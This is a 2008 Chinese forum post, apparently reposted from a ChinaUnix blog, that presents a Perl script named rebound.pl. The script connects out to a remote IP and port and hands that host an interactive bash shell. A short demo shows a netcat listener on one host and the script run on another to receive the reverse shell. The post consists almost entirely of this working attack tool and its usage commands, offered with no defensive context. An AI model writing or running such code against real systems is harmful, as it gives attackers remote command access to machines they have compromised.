- 论坛徽章:
- 0
|
[email=laiwei@debian:~$]laiwei@debian:~$[/email]
cat rebound.pl
#!/usr/bin/perl -w
#
use strict;
use Socket;
use IO::Handle;
if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;
-------------------------------------------------------------------------------------------------------
演示:
在主机A上面
nc -l -p 8888 -vv
在主机B上面
./rebound.pl AA.AA.AA.AA 8888
于是在主机A上面得到一个反弹shell
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/44495/showart_512069.html |
|
免费注册
发表于 2008-03-30 20:50